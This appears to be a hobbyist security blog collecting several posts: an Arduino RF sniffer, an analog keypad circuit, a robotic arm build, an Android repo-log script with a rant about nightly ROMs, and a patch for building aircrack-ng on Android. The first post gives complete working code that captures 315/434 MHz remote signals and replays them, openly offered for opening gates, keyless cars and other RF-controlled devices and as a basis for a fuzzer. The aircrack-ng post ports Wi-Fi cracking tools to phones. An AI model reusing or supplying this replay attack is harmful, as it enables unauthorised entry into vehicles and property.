RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

 

TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.

 

The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.

 

Shopping List

Amount	Part Type	Properties
2	Inductor	wire antenna
1	Red LED – 5mm	package 5 mm [THT]; leg yes; color Red (633nm)
1	Arduino Uno (Rev3)	type Arduino UNO (Rev3)
1	315Mhz RF-LINK_RX	package rf-link_rx; part # WRL-10533
1	434Mhz RF-LINK_RX	package rf-link_rx; part # WRL-10532
1	315Mhz RF-LINK_TX	package rf-link_tx; part # WRL-10535
1	434Mhz RF-LINK_TX	package rf-link_tx; part # WRL-10534

 

Scheme

We connect both receivers/transmitters like the following:

Code

And here is the Arduino code. Use at your own risk.

/*
 * RF Sniffer (C) Elia Yehuda 2014
 * 
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 *
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
        // print fast to console
        Serial.begin(115200);

        // 315 receiver on interrupt #0 (pin #2)
        rf315Switch.enableReceive(0);  
        // 315 transmitter on pin #4
        rf315Switch.enableTransmit(4);
        // how many resends
        rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
        
        // 434 receiver on interrupt #1 (pin #3)
        rf434Switch.enableReceive(1);  
        // 434 transmitter on pin #5
        rf434Switch.enableTransmit(5);
        // how many resends
        rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
        
        Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
        static char b[33];
        b[32] = '\0';
        
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        }
        
        return b;
}

void process_rf_value(RCSwitch rfswitch, int rf)
{
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);
        
        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);
        }
        Serial.println(str);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());
        
        // reset the switch to allow more data to come
        rfswitch.resetAvailable();
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);
}

void loop()
{

        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);
        }

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);
        }
}

Arduino keypad with 1 Analog pin

Here is my circuit design for Arduino keypad, using only 1 analog pin (instead of 7 serial pins), 6 resistors (can be reduced to 5) and 1 capacitor:

And now for the full story:

I decided it’s time to add a keypad to my Arduino playground. Usually, those simple keypads come with 7 pins (actually 9, but 2 are not connected to anything on 3×4 keypads) which are connected to Arduino like this:

I wanted to use less pins as possible, so I thought of getting 74hc165, but then I decided it’s time for a new challenge – resistors, and I went with something more like this:

As you can see it this diagram (and others found on the web), one can connect his keypad via 1 analog pin, using all kind of resistors schemes. I decided to build my own with the resistors I already have at home. My 1st setup worked fine, but resistors differentiation wasn’t enough and 2 keys (1 and 5) were showing same value when pressed. So I went along and fixed that, and the working result is the 1st diagram you saw in this post. Final shopping list follows:

Shopping List

Amount	Part Type	Properties
1	Ceramic Capacitor	package 100 mil [THT, multilayer]; capacitance 0.01µF; voltage 5V
3	330 Ω Resistor	package THT; tolerance ±5%; bands 4; resistance 330Ω; pin spacing 400 mil
2	2.2k Ω Resistor	package THT; tolerance ±5%; bands 4; resistance 2.2kΩ; pin spacing 400 mil
1	4.7k Ω Resistor	package THT; tolerance ±5%; bands 4; resistance 4.7kΩ; pin spacing 400 mil

Here is the Arduino code I’m using for my keypad. Check values to meet your own:

/*
 * keypad example.
 */

// analog pin connected to keypad
#define KEYPAD_PIN 0

// milliseconds to wait, to make sure key is pressed
#define TIME_TO_WAIT 50

void setup()
{
	Serial.begin(9600);
}

void loop()
{
	// reading once
	int r1 = analogRead(KEYPAD_PIN) / 10 * 10;
	// waiting
	delay(TIME_TO_WAIT);
	// reading 2nd time - to make sure key is pressed for at least TIME_TO_WAIT milliseconds
	int r2 = analogRead(KEYPAD_PIN) / 10 * 10;
	if (r1 == r2) {
		switch (r1) {
		case 350: Serial.println("0"); break;
		case 270: Serial.println("1"); break;
		case 360: Serial.println("2"); break;
		case 120: Serial.println("3"); break;
		case 210: Serial.println("4"); break;
		case 330: Serial.println("5"); break;
		case 0  : Serial.println("6"); break;
		case 240: Serial.println("7"); break;
		case 340: Serial.println("8"); break;
		case 50 : Serial.println("9"); break;
		case 250: Serial.println("*"); break;
		case 80 : Serial.println("#"); break;
		}
	}
}

My Robotics Adventures.

So, I bought myself this Robotic Arm Kit (similar to this) from China, since I thought it will be a nice thing to play with. Unfortunately, I didn’t notice the ‘Kit’ part in the name, and surely enough, the parts arrived disassembled. Alas – they also arrived without any documentation. After some googling, I found some info resembling those parts, but one conclusion presented itself  very quickly – a Robotic Arm is not a good starting point for a beginner such as myself. Servos, controllers, Arduino / Raspberry-PI / BeagleBone / YouNameIt, I had to start reading it all, and start assembling everything from scratch. I admit, the thought of getting a pre-assembled Arm was tempting, but I resisted the urge. It’s been a while since I last struggled with an unknown territory, so I decided to press on.

 

The parts started to come together, and after doing some more reading and online learning, I ordered myself an Arduino Uno coupled with a Pololu Maestro Servos Controller (12 channel), and all kinda pins, cables, connectors, etc. It started to look like a real Robotic Arm.

 

After assembling all the parts, it was time connect and wire everything. Since Arduino is part of the OSS ecosystem, I knew I can find all documentation I wanted. I didn’t assume it will be that tedious to find it. It turns out, each Servos Controller behaves differently, and expects different connections – some will be just happy with 1 VIN (Voltage In), while others require two power sources: one for Servos Controller Processor, and another for the Servos themselves; some will require direct TTL Serial, others the SPI (Serial Peripheral Interface), and so on, and on. Needless to say – a lot of reading, a lot of headache, and a lot of trial & error, but as one of my former bosses used to say – you learn from your mistakes, and so I did. Here is how the final assembled Robotic Arm looks like.

 

 

 

*TIP: You must connect your controller via USB for the 1st time to configure it, since the serial configuration (BAUD, etc) is being done via USB only using the supplied software.

 

The following two sites helped me the most figuring out how to connect the pins properly: Arduino Uno Pinout description, and the Pololu Micro Maestro 6-Channel Servo Controller tutorial (although it has one mistake on the diagram, and SPI didn’t work for me).

 

As you can see from the pictures, I connected all 6 servos to channels 0-5 on the controller, and used the blue jumper to connect the pins “VSRV=VIN” to indicate same power source for both Servos Processor and the servos themselves. I connected RX and TX on the controller to PIN-0 and PIN-1 on the Arduino UNO, respectively. I then connected the VIN and GND from the Arduino to the controller.

 

Next step was connecting a sensor (which was fairly easy thanks to this blog) – I connected a Photocell to a 10k resistor and connected it like the following:

 

It is now time for me to start working on the code part. Here is the basic code templates I’m using to control the servos and detect the sensor input:

 

#include <SoftwareSerial.h>

const int DEFAULT_BAUD = 9600;
const int SERVO_CONTROLLER_RX_PIN = 1; // The SERVO CONTROLLER'S RX PIN.
const int SERVO_CONTROLLER_TX_PIN = 0; // The SERVO CONTROLLER'S TX PIN.

SoftwareSerial ServoController = SoftwareSerial(SERVO_CONTROLLER_RX_PIN, SERVO_CONTROLLER_TX_PIN);

void setup()
{
   ServoController.begin(DEFAULT_BAUD);
   delay(500);
}

void moveServo(int ServoChannel, int target)
{
   //656ms PWM pulse represents a servo angle of 0 degrees.
   //2000ms PWM pulse represents a servo angele of 180 degrees.
   //These values could vary based on the servo you use, check your servo's
   //spec documentation and verify what PWM pulses are needed to move it.

   byte serialBytes[4]; //Create the byte array object that will hold the communication packet.

   target = (map(target, 0, 180, 656, 2000) * 4); //Map the target angle to the corresponding PWM pulse.

   serialBytes[0] = 0x84; // Command byte: Set Target.
   serialBytes[1] = ServoChannel; // First byte holds channel number.
   serialBytes[2] = target & 0x7F; // Second byte holds the lower 7 bits of target.
   serialBytes[3] = (target >> 7) & 0x7F; // Third byte holds the bits 7-13 of target.

   ServoController.write(serialBytes, sizeof(serialBytes)); //Write the byte array to the serial port.
}

void loop()
{
   moveServo(5, 180);
   moveServo(4, 180);
   delay(400);
   moveServo(5, 0);
   delay(400);
   moveServo(4, 0);
   delay(400);
}

The Photocell code:

const int PHOTOCELL_PIN = 0;

int lightLevel;
int lightLevelDefault;

void setup() {
 Serial.begin(9600);
 //Setup the starting light level limits
 lightLevelDefault = analogRead(PHOTOCELL_PIN);
}

void loop(){
 lightLevel = analogRead(PHOTOCELL_PIN);
 if (lightLevelDefault != lightLevel) {
   Serial.println(lightLevel);
 }
 //slow down the transmission for effective Serial communication.
 delay(50);
}

Nightlies Are For Dummies.

While working on our ZIMPERIUM Mobile IPS a.k.a zIPS, I’ve decided to take a break from this heavy duty work and enjoy myself a little with building our own ZIMPERIUM ROM, eg zROM. And here is my take.

~

No Nightlies for you!

~

Some Android ROM distributions allows nightlies updates, and many users happily oblige and install them. nightly.
I don’t like waste. And imo nightlies distributed to end-users, unlike beta-testers, is a complete waste; waste of resources, bandwidth, storage, and time, which is the most expensive commodity of all. I can already imagine the average Joe XDA user quoting OMNIs’ statement that ‘“nightlies are not for end users” is over-used, and no longer valid‘ BS. And I say BS because ignoring the waste doesn’t make it disappear.

I encourage everyone to check their ROM nightly changlelogs, and I provide my own script [*] to make it easier for Joe XDA to use it also. Updating a 200MB after a few translations files got updated or a new ADB rule got enforced, is a complete nonsense. Once you actually check the daily changelogs, you will also notice one major commit title repeating itself: REVERT. Many of those testings commits gets reverted because they break something, and it takes (usually) a few days to track this down and revert the faulting commit, meanwhile, leaving Joe XDA with a feature broken, in an optimistic scenario. In a real-life scenario, some of those nightlies will leave the users with a useless brick (I do admit it’s getting more rare due to exclusion of recovery.img from nightlies and less /system/ related changes). So now we’ve added stability to the waste.

Don’t be a sheep. Stop the waste. Trust the developers to do their work, and install the minor/major versions as they, the people who really knows what is working and what is not, decides to release.

[*]

#!/bin/bash
#
# Copyright (C) 2014 ZIMPERIUM Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

#
# Name : repolog.sh
#
# Descr: display logs from all repo git repositories
#
# Usage: repolog.sh <SINCE>|<DEVICE>
#
#        <SINCE> can be any valid git --since parameter, eg, 'yesterday'
#        or 'lastbuild' for getting logs since latest build (default)
#
#        <DEVICE> can be any device built already & exists in out/ dir, 
#        to show logs since latest build for this <DEVICE>
#
# Examples:
#
# To get all logs since yesterday:
# ./repolog.sh yesterday
#
# To get all logs since latest i9300 build:
# ./repolog.sh i9300
#
# To get all logs since latest build:
# ./repolog.sh
#

get_date() {
        find $1 -maxdepth 1 -printf "%TY-%Tm-%Td-%TT\n" | sort -nr | head -n 1 ;
}

TOP_DIR=${ANDROID_BUILD_TOP:-`pwd`}
SHOWGITNAME="yes"
PARAM=${1:-"lastbuild"}
case "$PARAM" in
        lastsync)
                # get date for last repo sync
                SINCE=$(get_date ${TOP_DIR}/.repo/project.list)
                ;;
        lastbuild)
                # get date for latest build of ANY device type
                SINCE=$(get_date ${TOP_DIR}/out/target/product/)
                ;;
        *)
                # get date for latest build of specific device type
                SINCE=$(get_date ${TOP_DIR}/out/target/product/$1)
                if [ -z $SINCE ]; then
                        # if no device found, use PARAM as SINCE, eg 'yesterday'
                        SINCE=$PARAM
                fi
                ;;
esac

repo forall -c '
        LOG=$(git log --since "'$SINCE'" --pretty=format:"%C(yellow)%ad %Cred%s%Creset%Cblue [%ce]%Creset" --decorate --date=short --numstat); 
        [ "$LOG" != "" ] && ([ "'$SHOWGITNAME'" != "" ] && TITLE=`sed -n "s/projectname.*=//p" .git/config|tr -d "[ \t]"` || TITLE="$REPO_PATH"; printf "===[ $TITLE ]";printf "%*s\n" "`expr ${COLUMNS:-$(tput cols)} - ${#TITLE} - 7`" "" | tr " " "="; echo "$LOG\n";)
' | less -FRX

Building aircrack-ng binaries (and friends) for Android.

Here is what I had todo to make aircrack-ng compile and run under Android using ndk-build.
I am also publishing the patch needed (previous patches has already been accepted in git) with the hope it will assist others as well.

1. Download and build iw (and libnl – this repo bundles the two):

git clone https://github.com/imlinhao/android-iw-libnl3.git
cd android-iw-libnl3/android_toolchain/
ndk-build
cd -

2. Save the following patch as android-aircrack.patch

diff -Naur android-aircrack/external/aircrack-ng/Android.mk android-aircrack.patched/external/aircrack-ng/Android.mk
--- android-aircrack/external/aircrack-ng/Android.mk	1970-01-01 00:00:00.000000000 +0000
+++ android-aircrack.patched/external/aircrack-ng/Android.mk	2014-03-28 15:51:23.795858371 +0000
@@ -0,0 +1,136 @@
+#
+# aircrack-ng for Android NDK
+#
+# by ziggy @ ZIMPERIUM.com
+#
+
+LOCAL_PATH:=$(call my-dir)
+
+include_aircrack_file:= \
+	$(LOCAL_PATH)/src/osdep          \
+	$(LOCAL_PATH)/src/include        \
+	$(LOCAL_PATH)/src/osdep/radiotap \
+	$(LOCAL_PATH)/src                \
+	$(NDK_PROJECT_PATH)/external/libpcap/ \
+	$(NDK_PROJECT_PATH)/external/openssl/include
+
+#
+# building static libraries
+#
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:= src/osdep/osdep.c src/osdep/airpcap.c src/osdep/file.c src/osdep/common.c src/osdep/network.c src/osdep/linux.c src/osdep/linux_tap.c src/osdep/radiotap/radiotap.c
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+LOCAL_MODULE:=libosdep
+include $(BUILD_STATIC_LIBRARY)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/aircrack-ptw-lib.c src/sha1-sse2.S src/uniqueiv.c src/common.c src/crypto.c
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+LOCAL_SHARED_LIBRARIES:=libcrypto libssl
+LOCAL_MODULE:=libaircrack-ptw
+include $(BUILD_STATIC_LIBRARY)
+
+#
+# building executables
+#
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/aircrack-ng.c
+LOCAL_MODULE:=aircrack-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libaircrack-ptw
+LOCAL_SHARED_LIBRARIES:=libcrypto
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/aireplay-ng.c src/common.c src/crypto.c
+LOCAL_MODULE:=aireplay-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/airodump-ng.c src/uniqueiv.c src/common.c src/crypto.c           
+LOCAL_MODULE:=airodump-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/besside-ng-crawler.c
+LOCAL_MODULE:=besside-ng-crawler
+LOCAL_C_INCLUDES:=$(NDK_PROJECT_PATH)/libpcap/ $(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep
+LOCAL_SHARED_LIBRARIES:=libpcap
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/buddy-ng.c src/common.c
+LOCAL_MODULE:=buddy-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/airtun-ng.c src/common.c src/crypto.c
+LOCAL_MODULE:=airtun-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep
+LOCAL_SHARED_LIBRARIES:=libcrypto
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/besside-ng.c
+LOCAL_MODULE:=besside-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep libaircrack-ptw
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/wesside-ng.c
+LOCAL_MODULE:=wesside-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep libaircrack-ptw
+LOCAL_SHARED_LIBRARIES:=libcrypto
+LOCAL_LDLIBS := -lz
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/easside-ng.c
+LOCAL_MODULE:=easside-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep libaircrack-ptw
+LOCAL_LDLIBS := -lz
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/airdecap-ng.c
+LOCAL_MODULE:=airdecap-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep libaircrack-ptw
+LOCAL_SHARED_LIBRARIES:=libcrypto
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:=src/airbase-ng.c
+LOCAL_MODULE:=airbase-ng
+LOCAL_C_INCLUDES:=$(include_aircrack_file)
+LOCAL_STATIC_LIBRARIES:=libosdep libaircrack-ptw
+LOCAL_SHARED_LIBRARIES:=libcrypto
+LOCAL_CFLAGS += -D_REVISION=0 -DRADIOTAP_SUPPORT_OVERRIDES
+include $(BUILD_EXECUTABLE)
+
+
diff -Naur android-aircrack/external/aircrack-ng/src/aircrack-ng.c android-aircrack.patched/external/aircrack-ng/src/aircrack-ng.c
--- android-aircrack/external/aircrack-ng/src/aircrack-ng.c	2014-03-28 15:58:55.119858371 +0000
+++ android-aircrack.patched/external/aircrack-ng/src/aircrack-ng.c	2014-03-28 15:41:08.135858371 +0000
@@ -40,7 +40,7 @@
 #define _GNU_SOURCE
 
 #include <sys/types.h>
-#include <sys/termios.h>
+#include <termios.h>
 #include <sys/ioctl.h>
 #include <sys/wait.h>
 #include <sys/stat.h>
diff -Naur android-aircrack/external/aircrack-ng/src/besside-ng.c android-aircrack.patched/external/aircrack-ng/src/besside-ng.c
--- android-aircrack/external/aircrack-ng/src/besside-ng.c	2014-03-28 15:58:55.123858371 +0000
+++ android-aircrack.patched/external/aircrack-ng/src/besside-ng.c	2014-03-28 15:41:08.135858371 +0000
@@ -51,6 +51,7 @@
 #include <errno.h>
 #include <netdb.h>
 #include <unistd.h>
+#include <pthread.h>
 
 #include "aircrack-ng.h"
 #include "version.h"
diff -Naur android-aircrack/external/aircrack-ng/src/besside-ng-crawler.c android-aircrack.patched/external/aircrack-ng/src/besside-ng-crawler.c
--- android-aircrack/external/aircrack-ng/src/besside-ng-crawler.c	2014-03-28 15:58:55.123858371 +0000
+++ android-aircrack.patched/external/aircrack-ng/src/besside-ng-crawler.c	2014-03-28 15:41:08.135858371 +0000
@@ -41,7 +41,7 @@
 #include <errno.h>
 #include <sys/stat.h>
 
-#include <pcap.h>
+#include <pcap/pcap.h>
 
 // Statistics
 uint32_t stats_files = 0;
@@ -350,4 +350,4 @@
   printf("WPA Network count:  %12d\n", stats_networks);
   
   return 0;
-}
\ No newline at end of file
+}
diff -Naur android-aircrack/external/aircrack-ng/src/osdep/radiotap/radiotap.c android-aircrack.patched/external/aircrack-ng/src/osdep/radiotap/radiotap.c
--- android-aircrack/external/aircrack-ng/src/osdep/radiotap/radiotap.c	2014-03-28 15:58:55.127858370 +0000
+++ android-aircrack.patched/external/aircrack-ng/src/osdep/radiotap/radiotap.c	2014-03-28 15:41:08.135858371 +0000
@@ -15,6 +15,7 @@
  */
 #include "radiotap_iter.h"
 #include "platform.h"
+#include "byteorder.h"
 
 /* function prototypes and related defs are in radiotap_iter.h */
 
diff -Naur android-aircrack/external/aircrack-ng/src/wesside-ng.c android-aircrack.patched/external/aircrack-ng/src/wesside-ng.c
--- android-aircrack/external/aircrack-ng/src/wesside-ng.c	2014-03-28 15:58:55.131858370 +0000
+++ android-aircrack.patched/external/aircrack-ng/src/wesside-ng.c	2014-03-28 15:41:08.135858371 +0000
@@ -33,7 +33,7 @@
 
 #include <sys/types.h>
 #include <sys/socket.h>
-#include <sys/termios.h>
+#include <termios.h>
 #include <sys/ioctl.h>
 #include <sys/stat.h>
 #include <sys/wait.h>
diff -Naur android-aircrack/external/Android.mk android-aircrack.patched/external/Android.mk
--- android-aircrack/external/Android.mk	1970-01-01 00:00:00.000000000 +0000
+++ android-aircrack.patched/external/Android.mk	2014-03-28 15:41:08.139858371 +0000
@@ -0,0 +1 @@
+include $(call all-subdir-makefiles)
diff -Naur android-aircrack/external/libpcap/Android.mk android-aircrack.patched/external/libpcap/Android.mk
--- android-aircrack/external/libpcap/Android.mk	2014-03-28 15:58:56.695858370 +0000
+++ android-aircrack.patched/external/libpcap/Android.mk	2014-03-28 15:47:11.063858371 +0000
@@ -20,7 +20,6 @@
         pcap.c\
         pcap-common.c\
         pcap-linux.c\
-        pcap-netfilter-linux.c\
 	savefile.c\
 	scanner.c\
         sf-pcap.c\
diff -Naur android-aircrack/external/libpcap/config.h android-aircrack.patched/external/libpcap/config.h
--- android-aircrack/external/libpcap/config.h	2014-03-28 15:58:56.699858370 +0000
+++ android-aircrack.patched/external/libpcap/config.h	2014-03-28 16:16:43.687858370 +0000
@@ -66,7 +66,7 @@
 /* #undef HAVE_LINUX_COMPILER_H */
 
 /* Define to 1 if you have the <linux/ethtool.h> header file. */
-#define HAVE_LINUX_ETHTOOL_H 1
+/* #undef HAVE_LINUX_ETHTOOL_H */
 
 /* Define to 1 if you have the <linux/if_packet.h> header file. */
 #define HAVE_LINUX_IF_PACKET_H 1
diff -Naur android-aircrack/external/openssl/Apps.mk android-aircrack.patched/external/openssl/Apps.mk
--- android-aircrack/external/openssl/Apps.mk	2014-03-28 15:58:56.227858371 +0000
+++ android-aircrack.patched/external/openssl/Apps.mk	2014-03-28 15:41:16.511858370 +0000
@@ -24,13 +24,3 @@
 include $(LOCAL_PATH)/android-config.mk
 include $(BUILD_EXECUTABLE)
 
-include $(CLEAR_VARS)
-LOCAL_MODULE:= openssl
-LOCAL_MODULE_TAGS := optional
-LOCAL_SRC_FILES := $(host_src_files)
-LOCAL_SHARED_LIBRARIES := $(local_shared_libraries)
-LOCAL_C_INCLUDES := $(host_c_includes)
-LOCAL_CFLAGS := $(host_c_flags)
-LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
-include $(LOCAL_PATH)/android-config.mk
-include $(BUILD_HOST_EXECUTABLE)
diff -Naur android-aircrack/external/openssl/Crypto.mk android-aircrack.patched/external/openssl/Crypto.mk
--- android-aircrack/external/openssl/Crypto.mk	2014-03-28 15:58:56.227858371 +0000
+++ android-aircrack.patched/external/openssl/Crypto.mk	2014-03-28 15:41:16.511858370 +0000
@@ -45,31 +45,3 @@
 LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
 include $(BUILD_SHARED_LIBRARY)
 
-#######################################
-# host shared library
-include $(CLEAR_VARS)
-include $(LOCAL_PATH)/android-config.mk
-LOCAL_SHARED_LIBRARIES := $(log_shared_libraries)
-LOCAL_SRC_FILES += $(host_src_files)
-LOCAL_CFLAGS += $(host_c_flags) -DPURIFY
-LOCAL_C_INCLUDES += $(host_c_includes)
-LOCAL_LDLIBS += -ldl
-LOCAL_MODULE_TAGS := optional
-LOCAL_MODULE:= libcrypto
-LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
-include $(BUILD_HOST_SHARED_LIBRARY)
-
-########################################
-# host static library, which is used by some SDK tools.
-
-include $(CLEAR_VARS)
-include $(LOCAL_PATH)/android-config.mk
-LOCAL_SHARED_LIBRARIES := $(log_shared_libraries)
-LOCAL_SRC_FILES += $(host_src_files)
-LOCAL_CFLAGS += $(host_c_flags) -DPURIFY
-LOCAL_C_INCLUDES += $(host_c_includes)
-LOCAL_LDLIBS += -ldl
-LOCAL_MODULE_TAGS := optional
-LOCAL_MODULE:= libcrypto_static
-LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
-include $(BUILD_HOST_STATIC_LIBRARY)
diff -Naur android-aircrack/external/openssl/Ssl.mk android-aircrack.patched/external/openssl/Ssl.mk
--- android-aircrack/external/openssl/Ssl.mk	2014-03-28 15:58:56.227858371 +0000
+++ android-aircrack.patched/external/openssl/Ssl.mk	2014-03-28 15:41:16.511858370 +0000
@@ -42,27 +42,3 @@
 LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
 include $(BUILD_SHARED_LIBRARY)
 
-#######################################
-# host shared library
-include $(CLEAR_VARS)
-include $(LOCAL_PATH)/android-config.mk
-LOCAL_SRC_FILES += $(host_src_files)
-LOCAL_CFLAGS += $(host_c_flags)
-LOCAL_C_INCLUDES += $(host_c_includes)
-LOCAL_SHARED_LIBRARIES += libcrypto $(log_shared_libraries)
-LOCAL_MODULE_TAGS := optional
-LOCAL_MODULE:= libssl
-LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
-include $(BUILD_HOST_SHARED_LIBRARY)
-
-#######################################
-# ssltest
-include $(CLEAR_VARS)
-include $(LOCAL_PATH)/android-config.mk
-LOCAL_SRC_FILES:= ssl/ssltest.c
-LOCAL_C_INCLUDES += $(host_c_includes)
-LOCAL_SHARED_LIBRARIES := libssl libcrypto $(log_shared_libraries)
-LOCAL_MODULE:= ssltest
-LOCAL_MODULE_TAGS := optional
-LOCAL_ADDITIONAL_DEPENDENCIES := $(local_additional_dependencies)
-include $(BUILD_EXECUTABLE)
diff -Naur android-aircrack/external/wireless-tools/Android.mk android-aircrack.patched/external/wireless-tools/Android.mk
--- android-aircrack/external/wireless-tools/Android.mk	2014-03-28 15:58:57.039858371 +0000
+++ android-aircrack.patched/external/wireless-tools/Android.mk	2014-03-28 15:41:16.511858370 +0000
@@ -14,9 +14,6 @@
 # limitations under the License.
 #
 
-ifneq ($(TARGET_SIMULATOR),true)
-ifeq ($(BOARD_WPA_SUPPLICANT_DRIVER),WEXT)
-
 LOCAL_PATH := $(call my-dir)
 include $(CLEAR_VARS)
 
@@ -59,5 +56,3 @@
 ALL_MODULES.$(LOCAL_MODULE).INSTALLED := \
     $(ALL_MODULES.$(LOCAL_MODULE).INSTALLED) $(SYMLINKS)
 
-endif
-endif
diff -Naur android-aircrack/jni/Android.mk android-aircrack.patched/jni/Android.mk
--- android-aircrack/jni/Android.mk	1970-01-01 00:00:00.000000000 +0000
+++ android-aircrack.patched/jni/Android.mk	2014-03-28 15:41:16.511858370 +0000
@@ -0,0 +1,2 @@
+LOCAL_PATH:=$(call my-dir)
+include $(LOCAL_PATH)/external/Android.mk
diff -Naur android-aircrack/jni/Application.mk android-aircrack.patched/jni/Application.mk
--- android-aircrack/jni/Application.mk	1970-01-01 00:00:00.000000000 +0000
+++ android-aircrack.patched/jni/Application.mk	2014-03-28 15:41:16.511858370 +0000
@@ -0,0 +1,5 @@
+APP_ABI          := armeabi
+APP_PLATFORM     := android-9
+APP_PROJECT_PATH := $(shell pwd)
+APP_BUILD_SCRIPT := $(APP_PROJECT_PATH)/external/Android.mk
+

3. Download, patch, and build aircrack-ng & wireless_tools (openssl & libpcap are dependencies):

